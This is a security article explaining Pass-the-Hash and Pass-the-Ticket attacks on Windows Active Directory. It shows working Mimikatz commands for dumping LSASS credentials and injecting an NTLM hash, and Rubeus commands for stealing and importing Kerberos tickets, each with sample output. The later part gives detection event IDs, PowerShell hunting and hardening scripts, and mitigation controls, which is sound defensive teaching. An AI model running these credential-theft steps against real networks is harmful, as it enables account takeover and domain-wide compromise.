In 2017, the NotPetya worm tore through corporate networks in hours — not by cracking passwords, but by reusing stolen NTLM hashes to move laterally without ever knowing a plaintext credential. That same technique, Pass-the-Hash (PtH), is still alive in 2026. Its Kerberos cousin, Pass-the-Ticket (PtT), is just as dangerous. Both exploit how Windows handles authentication, and both are trivially easy to execute once an attacker has local admin on a single machine.
Pass-the-Hash: Owning Machines With a Hash, Not a Password
NTLM authentication never requires your plaintext password. Windows hashes it and uses that hash, not the password, to prove your identity to the server. An attacker holding the hash can therefore impersonate you directly — no cracking required.
The classic tool here is Mimikatz. After compromising WORKSTATION-04 (192.0.2.44) and gaining local admin, an attacker dumps LSASS memory to pull cached hashes:
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 214893 (00000000:000347ad)
Session : Interactive from 1
User Name : jharrison
Domain : CORP
Logon Server : DC01
Logon Time : 7/4/2026 08:12:44
SID : S-1-5-21-3847261847-...
msv :
[00000003] Primary
* Username : jharrison
* Domain : CORP
* NTLM : a87f3a337d73085c45f9416be5787d86
* SHA1 : 2d2d2ef5e7e9c4d4e6a1b3f8c1234abc12345678
That NTLM hash for CORP\jharrison is the prize. If jharrison is a domain admin — or even a local admin on other boxes — the attacker now owns those machines too. No password needed.
Next, the attacker spawns a new process injected with that hash, pointing at a target server like FILESERVER-01 (192.0.2.10):
mimikatz # sekurlsa::pth /user:jharrison /domain:CORP /ntlm:a87f3a337d73085c45f9416be5787d86 /run:cmd.exe
* user : jharrison
* domain : CORP
* program : cmd.exe
* NTLM : a87f3a337d73085c45f9416be5787d86
| PID 4872
| TID 4876
\_ SecureChannel between these processes
From a network authentication perspective, that new cmd.exe window runs as jharrison: locally it still runs under the attacker's own token, but every outbound authentication it performs uses the injected hash. Type dir \\192.0.2.10\C$ and you’re browsing the C drive of the file server. From here an attacker drops a backdoor, exfiltrates data, or pivots deeper into the domain.
Pass-the-Ticket: Forging Kerberos Tickets to Impersonate Anyone
Kerberos replaced NTLM as the default Windows auth protocol — but it introduced its own problem. Kerberos tickets are cached in memory and are portable. Steal a ticket, use a ticket.
The go-to tool for PtT is Rubeus. On a compromised host, the attacker first lists current tickets to understand the environment:
C:\> Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x5e9a2
-----------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------
| 0x7f3c1 | jharrison @ CORP | krbtgt/CORP | 7/4/2026 |
| 0x7f3c1 | jharrison @ CORP | cifs/FILESERVER-01 | 7/4/2026 |
| 0x8a112 | svc_backup @ CORP | HOST/DC01.corp.local | 7/4/2026 |
-----------------------------------------------------------------
That svc_backup service account ticket for HOST/DC01 is interesting. Service accounts are frequently over-privileged and rarely monitored. The attacker dumps it and loads it into their own session:
C:\> Rubeus.exe dump /luid:0x8a112 /service:HOST/DC01 /nowrap
[*] Extracting ticket from LUID 0x8a112
[*] base64(ticket.kirbi):
doIFpDCCBaCgAwIBBaEDAgEWooIE...(truncated)...
C:\> Rubeus.exe ptt /ticket:doIFpDCCBaCgAwIBBaEDAgEWooIE...
[*] Action: Import Ticket
[+] Ticket successfully imported!
With that ticket loaded, the attacker authenticates to the domain controller as svc_backup — no password, no hash, just a stolen memory blob. If svc_backup has DCSync rights or local admin on DC01, game over for the domain.
The scarier variant is a Golden Ticket — a forged TGT built from the KRBTGT account hash. It grants domain-wide access for up to 10 years and survives password resets on every account except KRBTGT itself.
How Defenders Detect and Disrupt These Attacks
Both attacks leave traces if you know what to look for. On the target server, PtH shows up as Event ID 4624 with Logon Type 3 and the NTLM authentication package, which is unusual for internal logons in a Kerberos-native domain. PtT abuse shows up on the domain controller as Event ID 4768 and 4769 anomalies: tickets requested from unexpected IPs or at odd hours.
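As an added example (not code from the original post), this PowerShell hunt pulls the two indicators described above out of the Security log: 4624 network logons that used the NTLM package, and 4768/4769 ticket requests from source IPs outside subnets you trust. $LookbackHours and $TrustedSubnets are assumed placeholders, and the field names are the standard EventData names for those event IDs.

```powershell
# Added example, not code from the original post. It hunts for the two indicators the
# text names: 4624 network logons that used NTLM, and Kerberos ticket requests (4768/4769)
# from source IPs outside subnets you trust. Run it where the Security log lives (a DC for
# 4768/4769). $LookbackHours and $TrustedSubnets are assumed placeholders to tune.
$LookbackHours  = 24
$TrustedSubnets = @('10.0.', '192.0.2.')   # constructed example prefixes
$Since = (Get-Date).AddHours(-$LookbackHours)

# Pull one named <Data> field out of an event's XML body.
function Get-EventField {
    param([xml]$Xml, [string]$Name)
    ($Xml.Event.EventData.Data | Where-Object Name -eq $Name).'#text'
}

# 1) PtH indicator: 4624, Logon Type 3, NTLM package (machine accounts excluded).
$ntlmNetworkLogons = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Account     = '{0}\{1}' -f (Get-EventField $x 'TargetDomainName'), (Get-EventField $x 'TargetUserName')
            LogonType   = Get-EventField $x 'LogonType'
            AuthPackage = Get-EventField $x 'AuthenticationPackageName'
            SourceIp    = Get-EventField $x 'IpAddress'
            Workstation = Get-EventField $x 'WorkstationName'
        }
    } |
    Where-Object { $_.LogonType -eq '3' -and $_.AuthPackage -eq 'NTLM' -and $_.Account -notlike '*$' }

"NTLM network logons by account and source IP (last $LookbackHours h):"
$ntlmNetworkLogons | Group-Object Account, SourceIp | Sort-Object Count -Descending |
    Format-Table Count, Name -AutoSize

# 2) PtT indicator: TGT (4768) and service-ticket (4769) requests from untrusted source IPs.
$ticketRequests = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768, 4769; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        [pscustomobject]@{
            Time     = $_.TimeCreated
            Id       = $_.Id
            Account  = Get-EventField $x 'TargetUserName'
            Service  = Get-EventField $x 'ServiceName'
            SourceIp = ([string](Get-EventField $x 'IpAddress')) -replace '^::ffff:', ''
        }
    } |
    Where-Object { $ip = $_.SourceIp; -not ($TrustedSubnets | Where-Object { $ip.StartsWith($_) }) }

"Kerberos ticket requests from outside trusted subnets:"
$ticketRequests | Sort-Object Time | Format-Table Time, Id, Account, Service, SourceIp -AutoSize
```

A busy domain controller logs 4769 for every service ticket, so baseline the output before treating a single hit as an incident; a spike of NTLM logons for one account from one source IP is the PtH pattern worth pulling on first.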
Three controls cut the attack surface significantly:
- Enable Protected Users Security Group for all privileged accounts — it forces Kerberos, disables NTLM, and prevents credential caching.
- Deploy Credential Guard on Windows 11 endpoints to move LSA secrets into a virtualization-based isolated process Mimikatz can’t touch.
- Rotate KRBTGT twice after any suspected compromise — the first reset invalidates current tickets, the second clears the history.
Least privilege matters here too. If svc_backup only has rights to the backup share and nothing else, stealing its ticket is a dead end.
What To Do Now
Open your Active Directory and run this one query: pull every account in the Domain Admins group that is not in the Protected Users group. Those accounts are exposed to credential theft right now. Add them to Protected Users today — it takes 30 seconds per account and immediately disables NTLM authentication and credential caching for each one. That single change eliminates the most dangerous PtH and PtT paths in your environment.
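One way to run the query this paragraph describes, and to apply the Protected Users control from the list above, as an added example rather than code from the original post. It assumes the RSAT ActiveDirectory module; the -Apply switch and the HasSPN column are this example's own additions.

```powershell
#Requires -Modules ActiveDirectory
# Added example (not part of the original post): list Domain Admins that are not in
# Protected Users, and add them when -Apply is given. HasSPN flags accounts that look
# like service accounts, which Microsoft advises against placing in Protected Users.
param([switch]$Apply)

# Nested membership counts for both groups, so resolve recursively.
$domainAdmins   = Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Where-Object objectClass -eq 'user'
$protectedUsers = Get-ADGroupMember -Identity 'Protected Users' -Recursive | Select-Object -ExpandProperty SamAccountName

$exposed = $domainAdmins |
    Where-Object { $protectedUsers -notcontains $_.SamAccountName } |
    Get-ADUser -Properties LastLogonDate, PasswordNeverExpires, ServicePrincipalName |
    Select-Object SamAccountName, Enabled, LastLogonDate, PasswordNeverExpires,
        @{ n = 'HasSPN'; e = { $_.ServicePrincipalName.Count -gt 0 } }

'{0} of {1} Domain Admins are outside Protected Users:' -f @($exposed).Count, @($domainAdmins).Count
$exposed | Format-Table -AutoSize

if ($Apply) {
    # Skip SPN-bearing accounts: they are probably services and will break under Protected Users.
    foreach ($u in $exposed | Where-Object { -not $_.HasSPN }) {
        Add-ADGroupMember -Identity 'Protected Users' -Members $u.SamAccountName -Confirm:$false
        "Added $($u.SamAccountName) to Protected Users"
    }
}
```

Run it once without -Apply to review the list; members of Protected Users lose NTLM and get a 4-hour TGT lifetime, so move one account first and confirm its admin workflows still work before adding the rest.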
